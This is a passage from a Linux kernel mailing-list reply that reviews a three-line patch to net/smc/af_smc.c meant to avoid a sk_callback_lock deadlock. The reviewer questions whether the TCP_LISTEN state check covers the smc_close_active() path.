>   smc_close_flush_work+0x1f/0x30 [vuln_msv]
>   *** DEADLOCK ***
> 
> Return before taking sk_callback_lock when the underlying TCP socket is no
> longer in TCP_LISTEN.  In that state there is no listen accept work to
> queue for SMC, and avoiding the callback lock mirrors the fix used by the
> TCP nvmet listener.
> 
> Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback")
> Cc: stable@vger.kernel.org
> Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn>
> ---
>  net/smc/af_smc.c | 3 +++
>  1 file changed, 3 insertions(+)
> 
> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
>  {
>  	struct smc_sock *lsmc;
>  
> +	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
> +		return;
> +

In smc_close_active(), the TCP socket remains in the TCP_LISTEN state
while write_lock_bh(&smc->clcsock->sk->sk_callback_lock) is held.  The
patch's state check would pass during this window, so it would not
prevent the recursive lock scenario there.
It is therefore unclear whether the patch fully prevents the recursive
locking described in the commit message for the smc_close_active() code
path.
Could you describe the exact deadlock scenario and how the patch
addresses it?

>  	read_lock_bh(&listen_clcsock->sk_callback_lock);
>  	lsmc = smc_clcsock_user_data(listen_clcsock);
>  	if (!lsmc)

